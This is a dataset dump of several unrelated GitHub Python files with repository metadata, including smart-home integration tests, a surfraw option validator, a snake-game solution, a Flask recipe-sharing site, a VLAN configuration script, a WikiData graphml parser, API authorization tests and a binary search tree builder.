print(len(kbp_train_data))\n","repo_name":"RoganInglis/MastersProject","sub_path":"tests/tfrecords_experiments.py","file_name":"tfrecords_experiments.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27425694374","text":"from typing import Dict, Optional\n\nimport pytest\nfrom appdaemon.plugins.hass.hassapi import Hass\nfrom cx_core.controller import Controller\nfrom cx_core.integration.deconz import DeCONZIntegration\nfrom pytest_mock.plugin import MockerFixture\n\nfrom tests.test_utils import wrap_execution\n\n\n@pytest.mark.parametrize(\n \"data, type, expected\",\n [\n (\n {\"id\": 123, \"event\": 1002},\n None,\n 1002,\n ),\n (\n {\"id\": 123, \"gesture\": 2},\n \"gesture\",\n 2,\n ),\n ],\n)\nasync def test_callback(\n fake_controller: Controller,\n mocker: MockerFixture,\n data: Dict[str, int],\n type: Optional[str],\n expected: str,\n) -> None:\n handle_action_patch = mocker.patch.object(fake_controller, \"handle_action\")\n kwargs = {}\n if type is not None:\n kwargs[\"type\"] = type\n deconz_integration = DeCONZIntegration(fake_controller, kwargs)\n await deconz_integration.event_callback(\"test\", data, {})\n handle_action_patch.assert_called_once_with(expected, extra=data)\n\n\n@pytest.mark.parametrize(\n \"listen_to, expected_id\",\n [\n (\"id\", \"id\"),\n (\"unique_id\", \"unique_id\"),\n (None, \"id\"),\n (\"fake\", None),\n ],\n)\nasync def test_listen_changes(\n fake_controller: Controller,\n mocker: MockerFixture,\n listen_to: Optional[str],\n expected_id: Optional[str],\n) -> None:\n kwargs = {}\n if listen_to is not None:\n kwargs[\"listen_to\"] = listen_to\n\n listen_event_mock = mocker.patch.object(Hass, \"listen_event\")\n deconz_integration = DeCONZIntegration(fake_controller, kwargs)\n\n with wrap_execution(error_expected=expected_id is None, exception=ValueError):\n await deconz_integration.listen_changes(\"controller_id\")\n\n if expected_id is not None:\n listen_event_mock.assert_called_once_with(\n fake_controller,\n deconz_integration.event_callback,\n \"deconz_event\",\n **{expected_id: \"controller_id\"}\n )\n","repo_name":"xaviml/controllerx","sub_path":"tests/unit_tests/cx_core/integration/deconz_test.py","file_name":"deconz_test.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"44"} +{"seq_id":"22126932205","text":"from __future__ import annotations\n\nimport re\nfrom typing import TYPE_CHECKING, Callable, List, TypeVar, cast\n\nif TYPE_CHECKING:\n from typing_extensions import Final\n\n\nclass OptionParseError(Exception):\n \"\"\"Exception when options are given incorrect arguments.\"\"\"\n\n\nclass OptionResolutionError(Exception):\n \"\"\"Exception when resolving options' targets to concrete objects fails.\"\"\"\n\n\n# NAME\n\n# This is purposely not in the full range of shell variable names because I am\n# trying to encourage a particular naming convention. That is,\n# `SURFRAW_elvisname_onewordvar` is what the script would generate.\n_VALID_SURFRAW_VAR_NAME: Final = re.compile(\"^[a-z]+$\")\n\n\ndef validate_name(name: str) -> str:\n \"\"\"Return `name` unchanged if it is valid for inclusion in elvi.\n\n Raises `OptionParseError` on invalid input.\n \"\"\"\n if not _VALID_SURFRAW_VAR_NAME.fullmatch(name):\n raise OptionParseError(\n f\"name '{name}' is an invalid variable name for an elvis\"\n )\n return name\n\n\n# YES-NO\n\n# TODO: Should the yes-no option take the other forms?\n# TRUE_WORDS = {\"yes\", \"on\", \"1\"}\n# FALSE_WORDS = {\"no\", \"off\", \"0\"}\n_TRUE_WORDS: Final = {\"yes\"}\n_FALSE_WORDS: Final = {\"no\"}\n_BOOL_WORDS: Final = _TRUE_WORDS | _FALSE_WORDS\n\n\ndef validate_bool(bool_: str) -> str:\n \"\"\"Return `bool_` unchanged if it is a word representing a boolean.\n\n Raises `OptionParseError` on invalid input.\n \"\"\"\n if bool_ not in _BOOL_WORDS:\n valid_bools = \", \".join(sorted(_BOOL_WORDS))\n raise OptionParseError(\n f\"bool '{bool_}' must be one of the following: {valid_bools}\"\n )\n return bool_\n\n\ndef parse_bool(bool_: str) -> bool:\n \"\"\"Map boolean words to `True` or `False`.\n\n Raises `OptionParseError` on invalid input.\n \"\"\"\n if bool_ in _TRUE_WORDS:\n return True\n elif bool_ in _FALSE_WORDS:\n return False\n else:\n valid_bools = \", \".join(sorted(_BOOL_WORDS))\n raise OptionParseError(\n f\"bool '{bool_}' must be one of the following: {valid_bools}\"\n )\n\n\n# OPTION TYPES is defined elsewhere to avoid circular imports.\n\n# ENUM VALUES\n\n_VALID_ENUM_VALUE_STR: Final = \"^[a-z0-9][a-z0-9_+-]*$\"\n_VALID_ENUM_VALUE: Final = re.compile(_VALID_ENUM_VALUE_STR)\n\n\ndef validate_enum_value(value: str) -> str:\n \"\"\"Return `value` unchanged if it is valid for surfraw enums.\n\n Technically, anything is valid for surfraw enums, but *our* enums are\n restricted since it makes life a bit easier.\n\n Raises `OptionParseError` on invalid input.\n \"\"\"\n if not _VALID_ENUM_VALUE.fullmatch(value):\n raise OptionParseError(\n f\"enum value '{value}' must match the regex '{_VALID_ENUM_VALUE_STR}'\"\n )\n return value\n\n\n# MISC.\n\n\ndef no_validation(arg: str) -> str:\n \"\"\"Return `arg` unchanged.\n\n This is an identity function and raises no exceptions.\n \"\"\"\n return arg\n\n\nT = TypeVar(\"T\")\n\n\ndef list_of(validator: Callable[[str], T]) -> Callable[[str], List[T]]:\n \"\"\"Run `validator` on a comma-delimited list of arguments.\"\"\"\n\n def list_validator(arg: str) -> List[T]:\n if arg == \"\":\n return []\n values = arg.split(\",\")\n # In case the validators return a different object from its input (i.e., parsers).\n for i, value in enumerate(values):\n # Mutating it is fine here.\n values[i] = validator(value) # type: ignore\n return cast(List[T], values)\n\n return list_validator\n","repo_name":"Hoboneer/surfraw-tools","sub_path":"surfraw_tools/lib/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"44"} +{"seq_id":"30559684164","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\n# n * n 배열을 모두 0으로 초기화\r\nn = int(input())\r\nboard = [[0]*n for _ in range(n)]\r\n\r\n# 사과가 있는 자리는 모두 1로 표시\r\nk = int(input())\r\nfor k in range(k):\r\n x, y = map(int,input().split())\r\n board[x-1][y-1] = 1\r\n\r\n# 방향 변경 정보를 입력받아 저장\r\ndirection = deque()\r\nl = int(input())\r\nfor i in range(l):\r\n t, d = input().split()\r\n direction.append((t,d))\r\n\r\n# 다음 변경 시간과, 변경 방향\r\nchange_t, change_d = direction.popleft()\r\n\r\n\r\n# 위, 왼, 아래, 오\r\ndx = [-1,0,1,0]\r\ndy = [0,-1,0,1]\r\n\r\n# 경과시간은 0, 현재방향은 오른쪽으로 초기화\r\ntime = 0\r\ndirect = 3\r\n\r\n# 뱀의 몸이 지나간 좌표를 차례대로 저장\r\n# 꼬리 길이를 줄여야할 때 사용하기 위함\r\nsnake = deque()\r\nsnake.append((0,0))\r\n\r\nx, y = 0, 0\r\nwhile True:\r\n\r\n # 경과시간을 증가시켜준다.\r\n time += 1\r\n\r\n # 뱀이 바라보고 있는 좌표로 이동\r\n nx, ny = x + dx[direct], y + dy[direct]\r\n\r\n # 리스트 범위 벗어나는지 체크\r\n if 0<=nx 1:\r\n break\r\n # 이동하려고 하는 좌표가 범위를 벗어나면 종료한다.\r\n else:\r\n break\r\n\r\n # 방향을 변경해야 한다면, 변경한다.\r\n if time == int(change_t):\r\n if change_d == 'D':\r\n if direct > 0:\r\n direct -= 1\r\n else:\r\n direct = 3\r\n elif change_d == 'L':\r\n if direct < 3:\r\n direct += 1\r\n else:\r\n direct =0\r\n if len(direction) > 0:\r\n change_t, change_d = direction.popleft()\r\n else:\r\n change_t = 0\r\n\r\n# 결과 출력\r\nprint(time)\r\n \r\n","repo_name":"caboooom/Algorithm","sub_path":"백준/Gold/3190. 뱀/뱀.py","file_name":"뱀.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22964103237","text":"from setuptools import find_packages, setup\nfrom glob import glob\nimport os\n\n\npackage_name = 'referee_console'\n\ndata_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml'])\n ]\n\nsetup(\n name=package_name,\n version='0.0.1',\n packages=find_packages(exclude=['test']),\n data_files=data_files,\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='Vitalii Kudinov',\n maintainer_email='v.kudinov@g.nsu.ru',\n description='Referee console for Autorace 2023',\n license='Apache 2.0',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'mission_autorace_2023_referee = referee_console.mission_autorace_2023_referee:main'\n ],\n },\n)\n","repo_name":"psan3333/Robotics_course","sub_path":"autorace/my_robot/referee_console/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28820069152","text":"from flask import Flask, render_template, request, redirect, flash, url_for\r\nfrom flask_bootstrap import Bootstrap\r\nfrom flask_moment import Moment\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import StringField, SubmitField, PasswordField, BooleanField, Label, TextAreaField\r\nfrom wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_bcrypt import Bcrypt\r\nfrom flask_login import LoginManager, UserMixin, login_user, current_user, logout_user, login_required\r\nfrom flask_migrate import Migrate\r\n\r\napp = Flask(__name__)\r\napplication = app\r\napp.config['SECRET_KEY'] = 'hard to guess string'\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///community.db'\r\nbcrypt = Bcrypt(app)\r\ndb = SQLAlchemy(app)\r\nmigrate = Migrate(app, db) # this\r\nlogin_manager = LoginManager(app)\r\nlogin_manager.login_view = 'login'\r\nlogin_manager.login_message_category = 'info'\r\n\r\n\r\nclass User(db.Model, UserMixin):\r\n id = db.Column(db.Integer, primary_key=True)\r\n username = db.Column(db.String(30), unique=True, nullable=False)\r\n email = db.Column(db.String(120), unique=True, nullable=False)\r\n password = db.Column(db.String(60), nullable=False)\r\n recipes = db.relationship('Recipe', backref='author', lazy=True)\r\n\r\n def __repr__(self):\r\n return f\"User('{self.username}',{self.email}')\"\r\n\r\nclass Comment(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n title = db.Column(db.String(120), nullable=False)\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\r\n username = db.Column(db.String(30), nullable=False)\r\n recipe_id = db.Column(db.Integer, db.ForeignKey('recipe.id'), nullable=False)\r\n description = db.Column(db.String(65535), nullable=False)\r\n\r\n def __repr__(self):\r\n return f\"Comment('{self.title}')\"\r\n\r\n\r\nclass Recipe(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n title = db.Column(db.String(120), nullable=False)\r\n description = db.Column(db.String(65535), nullable=False)\r\n ingredients = db.Column(db.String(65535), nullable=False)\r\n instructions = db.Column(db.String(65535), nullable=False)\r\n notes = db.Column(db.String(65535), nullable=False)\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\r\n like = db.Column(db.Integer, default=0, nullable=False)\r\n dislike = db.Column(db.Integer, default=0, nullable=False)\r\n\r\n def __repr__(self):\r\n return f\"Post('{self.title}')\"\r\n\r\n\r\nclass RegistrationForm(FlaskForm):\r\n username = StringField('Username', validators=[DataRequired(), Length(min=3, max=30)])\r\n email = StringField('Email', validators=[DataRequired(), Email()])\r\n password = PasswordField('Password', validators=[DataRequired()])\r\n confirm_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])\r\n submit = SubmitField('Sign up')\r\n\r\n def validate_username(self, username):\r\n user = User.query.filter_by(username=username.data).first()\r\n if user:\r\n raise ValidationError('Username already exists.')\r\n\r\n def validate_email(self, email):\r\n user = User.query.filter_by(email=email.data).first()\r\n if user:\r\n raise ValidationError('Email already exists.')\r\n\r\n\r\nclass LoginForm(FlaskForm):\r\n email = StringField('Email', validators=[DataRequired(), Email()])\r\n password = PasswordField('Password', validators=[DataRequired()])\r\n remember = BooleanField('Remember Me')\r\n submit = SubmitField('Sign in')\r\n\r\n\r\nclass CommentForm(FlaskForm):\r\n title = StringField('Title for your comment:', validators=[DataRequired()])\r\n description = TextAreaField('Enter you comment here:', validators=[DataRequired()])\r\n submit = SubmitField('Add Comment')\r\n\r\nclass RecipeForm(FlaskForm):\r\n title = StringField('Title for your recipe', validators=[DataRequired()])\r\n description = TextAreaField('Enter a description', validators=[DataRequired()])\r\n ingredients = TextAreaField('Enter ingredients one on each line', validators=[DataRequired()])\r\n instructions = TextAreaField('Enter instructions one on each line', validators=[DataRequired()])\r\n notes = TextAreaField('Wanna brag?', validators=[DataRequired()])\r\n submit = SubmitField('Add Recipe')\r\n\r\n def __init__(self, mode=None, **kwargs):\r\n super().__init__(**kwargs)\r\n if mode is not None:\r\n # Update labels based on the mode the form is opened!\r\n self.submit.label = Label(self.submit.id, \"Update existing recipe\")\r\n self.title.label = Label(self.title.id, \"Update recipe name?\")\r\n self.description.label = Label(self.title.id, \"Update description?\")\r\n self.ingredients.label = Label(self.title.id, \"Update ingredients?\")\r\n self.instructions.label = Label(self.title.id, \"Update instructions?\")\r\n self.notes.label = Label(self.title.id, \"Update notes?\")\r\n\r\n\r\nbootstrap = Bootstrap(app)\r\nmoment = Moment(app)\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return User.query.get(int(user_id))\r\n\r\n\r\n@app.errorhandler(404)\r\ndef page_not_found(e):\r\n return render_template('404.html'), 404\r\n\r\n\r\n@app.errorhandler(500)\r\ndef internal_server_error(e):\r\n return render_template('500.html'), 500\r\n\r\n\r\n@app.route('/')\r\n@app.route('/home')\r\ndef home():\r\n recipes = Recipe.query.order_by(Recipe.like.desc()).all()\r\n comments = Comment.query.all()\r\n return render_template('index.html', recipes=recipes, comments=comments)\r\n\r\n\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef register():\r\n if current_user.is_authenticated:\r\n return redirect(url_for('home'))\r\n form = RegistrationForm()\r\n if form.validate_on_submit():\r\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\r\n user = User(username=form.username.data, email=form.email.data, password=hashed_password)\r\n db.session.add(user)\r\n db.session.commit()\r\n flash('Welcome to our community! You can now login.', 'success')\r\n return redirect(url_for('login'))\r\n return render_template('register.html', form=form)\r\n\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n if current_user.is_authenticated:\r\n return redirect(url_for('home'))\r\n form = LoginForm()\r\n if form.validate_on_submit():\r\n user = User.query.filter_by(email=form.email.data).first()\r\n if user and bcrypt.check_password_hash(user.password, form.password.data):\r\n login_user(user)\r\n flash(f'Login succeeded. Welcome! {user.username} .', 'success')\r\n return redirect(url_for('home'))\r\n else:\r\n flash('Login failed, please check your email and password.', 'danger')\r\n return render_template('login.html', form=form)\r\n\r\n\r\n@app.route('/logout')\r\ndef logout():\r\n logout_user()\r\n return redirect(url_for('home'))\r\n\r\n\r\n@app.route('/account')\r\n@login_required\r\ndef account():\r\n return render_template('account.html', title='Account')\r\n\r\n@app.route('/comment', methods=['POST', 'GET'])\r\n@login_required\r\ndef comment():\r\n user = User.query.filter_by(username=current_user.username).first()\r\n form = CommentForm()\r\n if form.validate_on_submit():\r\n recipe_id = request.args.get('recipe_id')\r\n new_comment=Comment(title=form.title.data, user_id=user.id, username=user.username, description=form.description.data, recipe_id=recipe_id)\r\n db.session.add(new_comment)\r\n db.session.commit()\r\n flash('Comment added successfully.', 'success')\r\n return redirect(url_for('home'))\r\n return render_template('comment.html', form=form)\r\n\r\n@app.route('/like', methods=['GET'])\r\n@login_required\r\ndef like():\r\n recipe_id = request.args.get('recipe_id')\r\n recipe = Recipe.query.filter_by(id=recipe_id).first()\r\n new_like = recipe.like+1\r\n recipe.like = new_like\r\n db.session.commit()\r\n recipes = Recipe.query.order_by(Recipe.like.desc()).all()\r\n comments = Comment.query.all()\r\n return render_template('index.html', recipes=recipes, comments=comments)\r\n\r\n@app.route('/dislike', methods=['GET'])\r\n@login_required\r\ndef dislike():\r\n recipe_id = request.args.get('recipe_id')\r\n recipe = Recipe.query.filter_by(id=recipe_id).first()\r\n new_dislike = recipe.dislike+1\r\n recipe.dislike = new_dislike\r\n db.session.commit()\r\n recipes = Recipe.query.order_by(Recipe.like.desc()).all()\r\n comments = Comment.query.all()\r\n return render_template('index.html', recipes=recipes, comments=comments)\r\n\r\n@app.route('/recipe', methods=['POST', 'GET'])\r\n@login_required\r\ndef recipe():\r\n user = User.query.filter_by(username=current_user.username).first()\r\n form = RecipeForm()\r\n if request.method == \"GET\":\r\n form_mode = \"add\"\r\n recipes = Recipe.query.filter_by(user_id=user.id).order_by(Recipe.like.desc()).all()\r\n if 'edit_recipe' in request.args:\r\n recipe_id = request.args.get('edit_recipe')\r\n recipe_to_update = Recipe.query.filter_by(id=recipe_id).first()\r\n edit_form = RecipeForm(recipe_to_update)\r\n edit_form.ingredients.data = recipe_to_update.ingredients\r\n edit_form.title.data = recipe_to_update.title\r\n edit_form.description.data = recipe_to_update.description\r\n edit_form.notes.data = recipe_to_update.notes\r\n edit_form.instructions.data = recipe_to_update.instructions\r\n edit_form.submit.data = \"Update recipe!\"\r\n form_mode = \"edit\"\r\n form = edit_form\r\n return render_template('recipe.html', recipes=recipes, form=form, form_mode=form_mode)\r\n elif request.method == \"POST\":\r\n form = RecipeForm(request.form)\r\n if form.validate_on_submit():\r\n print(form)\r\n if 'edit_recipe' not in request.args:\r\n # Create a db.Model type of Ingredient from the form data received\r\n new_recipe = Recipe(title=form.title.data, description=form.description.data,\r\n instructions=form.instructions.data, ingredients=form.ingredients.data,\r\n notes=form.notes.data, user_id=user.id)\r\n # Add the record in a pending transaction\r\n db.session.add(new_recipe)\r\n # Finally commit it to push the changes to the database\r\n db.session.commit()\r\n # Saved, send a get request on homepage\r\n return redirect('/')\r\n else:\r\n # Need to edit recipe\r\n recipe_id = request.args.get('edit_recipe')\r\n to_update_recipe = Recipe.query.filter_by(id=recipe_id).first()\r\n to_update_recipe.title = form.title.data\r\n to_update_recipe.description = form.description.data\r\n to_update_recipe.ingredients = form.ingredients.data\r\n to_update_recipe.instructions = form.instructions.data\r\n to_update_recipe.notes = form.notes.data\r\n db.session.add(to_update_recipe)\r\n db.session.commit()\r\n return redirect('/')\r\n return render_template('recipe.html')\r\n\r\n\r\n@app.route('/recipe/delete/', methods=['GET'])\r\n@login_required\r\ndef delete_recipe(recipe_id):\r\n recipe = Recipe.query.filter_by(id=recipe_id).first()\r\n db.session.delete(recipe)\r\n db.session.commit()\r\n return redirect('/')\r\n","repo_name":"NanaOkada/cooking","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":11530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74165269252","text":"import os\nimport subprocess\nimport re\n\n\nwhile 1:\n print('enter 1 to Add vlan for interface')\n print('enter 0 to exit')\n choose = input('choose: ')\n \n if int(choose) == 1:\n print('Add vlan for interface:')\n inf = input('Enter the interface you want to add vlan: ')\n\n #check vlan\n cmd_bf = ['bridge', 'vlan', 'ciscoshow']\n proc = subprocess.Popen(cmd_bf, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n o_bf, e_bf = proc.communicate()\n data_bf = str(o_bf)\n vlan_c = []\n data_bf = data_bf.replace('\\\\n','')\n data_bf = data_bf.replace('\\\\t',' ')\n data_bf = data_bf.replace('-','')\n arr_data = data_bf.split(' ')\n print('Vlan has been config:')\n for i in arr_data:\n if re.findall('vlan',i):\n print(i)\n num_vlan = []\n for i in arr_data:\n if re.findall('vlan',i):\n temp = re.sub(r'\\D', \"\",i)\n num_vlan.append(int(temp))\n print(\"vlan was config:\" + str(num_vlan))\n\n vlan = input('Enter the vlan you want to add interface: ')\n while 1:\n check = 0;\n for vlan_tmp in num_vlan:\n if int(vlan_tmp) == int(vlan):\n check = 1;\n if int(check) == 1:\n break;\n else:\n vlan = input('please enter value vlan was config: ')\n cmd1 = '/usr/bin/clish -x /Klish-XML/ -c \"enable network\" -c \"configure terminal\" -c \"interface ethernet %s\" -c \"switchport mode access\" -c \"switchport access vlan %s\" '%(inf,vlan)\n print(cmd1)\n os.system(str(cmd1))\n # check interface vlan\n\n cmd_bf = ['bridge', 'vlan', 'ciscoshow']\n proc = subprocess.Popen(cmd_bf, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n line_num = 0;\n interface = []\n count = int(0)\n while True:\n line = proc.stdout.readline()\n if not line:\n break\n line_temp = str(line)\n line_temp = line_temp.replace('\\\\t',' ')\n line_temp = line_temp.replace('\\\\n','')\n line_temp = line_temp.replace(\"'\",\" \")\n line_temp = line_temp.replace(\",\",\" \")\n vlan_temp = 'vlan%s'%(vlan)\n if re.findall(vlan_temp,line_temp):\n temp = line_temp\n check_vlan = str(temp).split(' ')\n print(check_vlan)\n for i in check_vlan:\n if(str(i) == str(inf)):\n count = count + 1\n if count == 0:\n print('FALSE')\n else:\n print('PASSED')\n\n elif int(choose) == 0:\n break\n else:\n print('please choose 1 or 0')\n","repo_name":"HaiAnh1802/AutoTest","sub_path":"VLAN/add_interface_vlan.py","file_name":"add_interface_vlan.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19725811479","text":"import argparse\nimport pandas as pd\nimport get_counts as gc\nimport update_graphml as ug\n\nrecip_rels = {'P527': 'P361',\n 'P361': 'P527',\n 'P2176': 'P2175',\n 'P2175': 'P2176',\n 'P702': 'P688',\n 'P688': 'P702',\n 'P1343': 'P4510',\n 'P4510': 'P1343',\n 'P828': 'P1542',\n 'P1542': 'P828',\n 'P3781': 'P3780',\n 'P3780': 'P3781'}\n\ndef get_info_from_graphml(filename, outname=None, endpoint=None):\n\n query_list = dict()\n\n # Use the desired endpoint\n if endpoint is not None:\n gc.change_endpoint(endpoint)\n\n # Read the graphml file and break into nodes and edged\n tree = ug.read_graphml(filename)\n root = tree.getroot()\n graph = ug.get_graph(root)\n nodes = ug.get_nodes(graph)\n edges = ug.get_edges(graph)\n\n # Get info specific to this WikiData items from the graph\n n_id_map, e_id_map = ug.get_node_edge_attrib_mappers(root)\n n_to_qid = ug.get_node_id_to_qid(nodes, n_id_map)\n node_info = ug.get_node_info_to_update(nodes, n_id_map)\n edge_info = ug.get_edge_info_to_update(edges, n_to_qid, e_id_map)\n\n prop_names = gc.get_prop_labels()\n node_names = {k: v.get('NodeLabel') for k, v in node_info.items()}\n\n\n # Initialize the variables to collect data\n n_ids = []\n n_names = []\n p_ids = []\n p_names = []\n counts = []\n # Loop through and extract all node property information\n for n_id, n_info in node_info.items():\n for prop, count in n_info.get('props', dict()).items():\n n_ids.append(n_id)\n n_names.append(node_names.get(n_id))\n p_ids.append(prop)\n p_names.append(prop_names.get(prop))\n counts.append(count)\n # Compile results to DataFrame\n nodes_out = pd.DataFrame({'subject_type_name': n_names, 'subject_type_qid': n_ids,\n 'property_name': p_names, 'property_pid': p_ids,\n 'count': counts})\n # sort the nodes by count for easier comparison\n nodes_out = nodes_out.sort_values(['subject_type_name', 'count'], ascending=[True, False])\n\n # Initialize edge information collection\n n1_ids = []\n n1_names = []\n n2_ids = []\n n2_names = []\n p_ids = []\n p_names = []\n for edge_key in edge_info.keys():\n n1_id = edge_key[0]\n p_id = edge_key[1]\n n2_id = edge_key[2]\n\n n1_ids.append(n1_id)\n n1_names.append(node_names.get(n1_id))\n p_ids.append(p_id)\n p_names.append(prop_names.get(p_id))\n n2_ids.append(n2_id)\n n2_names.append(node_names.get(n2_id))\n\n # Get revierse edge info if a reciprical relationship\n if p_id in recip_rels:\n n1_ids.append(n2_id)\n n1_names.append(node_names.get(n2_id))\n p_ids.append(recip_rels[p_id])\n p_names.append(prop_names.get(recip_rels[p_id]))\n n2_ids.append(n1_id)\n n2_names.append(node_names.get(n1_id))\n\n edges_out = pd.DataFrame({'subject_type_name': n1_names, 'subject_type_qid': n1_ids,\n 'property_name': p_names, 'property_pid': p_ids,\n 'object_type_name': n2_names, 'object_type_qid': n2_ids})\n\n out = pd.concat([nodes_out, edges_out], sort=False).drop('count', axis=1)\n if outname is None:\n outname = 'query_info.csv'\n out.to_csv(outname, index=False)\n\n\nif __name__ == \"__main__\":\n # Command line Parsing\n parser = argparse.ArgumentParser(description='Parse a complete .graphml to get arguments for querying data'+\n ' provenance. (input to get_prov_counts.py)')\n parser.add_argument('filename', help=\"The .graphml to parse for subject, predicate, object and property\" + \\\n \" identifiers and information\", type=str)\n parser.add_argument('-o', '--outname', help=\"The name of the output file. (Default 'query_info.csv')\",\n type=str, default=None)\n parser.add_argument('-e', '--endpoint', help='Use a wikibase endpoint other than standard wikidata', type=str,\n default=None)\n\n #Unpack the CLI args\n args = parser.parse_args()\n filename = args.filename\n outname = args.outname\n endpoint = args.endpoint\n\n # run the pipeline\n get_info_from_graphml(filename, outname=outname, endpoint=None)\n\n","repo_name":"SuLab/genewikiworld","sub_path":"src/parse_graphml_connectivity.py","file_name":"parse_graphml_connectivity.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"724571368","text":"import time\nfrom assertion import *\nfrom http_methods import HttpMethod\nfrom utils.const.const_authorization import *\n\n\nurl = 'https://abc.ru'\npath = '/api/v1/auth/'\nurl_auth = url + path\n\n\nclass Authorization(HttpMethod):\n\n \"\"\"Проверка наличия аккаунта /api/v1/auth/check-login\"\"\"\n def checking_account_availability(self):\n print('\\nPOST Проверка наличия аккаунта /api/v1/auth/check-login')\n response = self.post(url_auth + 'check-login',\n post_json=json_for_check_email_for_login)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, expected_params_check_login)\n Assertions.assert_value_in_json(response, 'registrationRequired', False,\n response.json()['data'][\n 'registrationRequired'])\n print(\"response_json = \", response.json())\n\n \"\"\"Проверка наличия аккаунта администратора \n /api/v1/auth/admin/check-login\"\"\"\n def checking_admin_account_availability(self):\n print('\\nPOST Проверка наличия аккаунта администратора '\n '/api/v1/auth/check-login')\n response = self.post(url_auth + 'admin/check-login',\n post_json=json_for_check_admin_acount)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, expected_params_check_admin_acount)\n Assertions.assert_value_in_json(response, 'registrationRequired', True,\n response.json()['data'][\n 'registrationRequired'])\n print(\"response_json = \", response.json())\n\n \"\"\"Отправка кода подтверждения /api/v1/auth/confirm-code/send\"\"\"\n def send_confirm_code(self):\n print('\\nPOST Отправка кода подтверждения '\n '/api/v1/auth/confirm-code/send')\n response = self.post(url_auth + 'confirm-code/send',\n post_json=json_for_send_confirm_code)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, list_of_expected_params_from_comfirm_code)\n Assertions.assert_value_in_json(response, 'status', 'ok',\n response.json()['data']['status'])\n print(\"response_json = \", response.json())\n\n \"\"\"Авторизация /api/v1/auth/login\"\"\"\n def login(self):\n print('\\nPOST Авторизация /api/v1/auth/login')\n response = self.post(url_auth + 'login',\n post_json=json_for_login)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, expected_params_login)\n print(\"response_json = \", response.json())\n global refresh, access\n refresh = response.json()['data']['refresh']\n access = response.json()['data']['access']\n\n \"\"\"Обновление токена /api/v1/auth/token/refresh\"\"\"\n def refresh_token(self):\n print('\\nPOST Обновление токена /api/v1/auth/token/refresh')\n json_for_refresh = {\"refresh\": refresh}\n response = self.post(url_auth + 'token/refresh',\n post_json=json_for_refresh)\n Assertions.assert_status_code(response, 200)\n Assertions.assert_params_in_json(\n response, expected_params_resresh)\n Assertions.\\\n assert_value_in_json_not_equal_to_actual(\n response, 'access', access, response.json()['data']['access'])\n Assertions.\\\n assert_value_in_json_not_equal_to_actual(\n response, 'refresh', refresh, response.json()[\n 'data']['refresh'])\n Assertions.\\\n assert_value_in_json_not_equal_to_actual(\n response, 'expire', round(time.time()),\n response.json()['data']['expire'])\n print(\"response_json = \", response.json())\n","repo_name":"BondarenkoAleksey/api_example","sub_path":"utils/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26928805473","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAuthors: Hung-Hsin Chen \nLicense: GPL v2\n\"\"\"\n\ndef pre_order_to_binary_search_tree(nodes):\n \"\"\"\n dict to implement binary tree,\n nodes: list of values\n \"\"\"\n stack = []\n tree = {}\n stack.append((nodes, tree))\n\n while len(stack):\n sub_nodes, sub_tree = stack.pop()\n root = sub_nodes[0]\n sub_tree['value'] = root\n\n if len(sub_nodes) == 1:\n # leaf node\n sub_tree['lchild'] = sub_tree['rchild'] = None\n else:\n # internal node\n smaller = 0\n for node in sub_nodes[1:]:\n if node > root:\n break\n smaller += 1\n # print (\"sub_nodes:\", sub_nodes, root)\n # print (\"slice:\", smaller, sub_nodes[1:1+smaller],\n # sub_nodes[1 + smaller:])\n # check left sub-tree\n if smaller:\n left_children = sub_nodes[1:1 + smaller]\n sub_tree['lchild'] = {}\n stack.append((left_children, sub_tree['lchild']))\n else:\n sub_tree['lchild'] = None\n\n # check right sub-tree\n larger = len(sub_nodes) - smaller - 1\n if larger:\n right_children = sub_nodes[1 + smaller:]\n 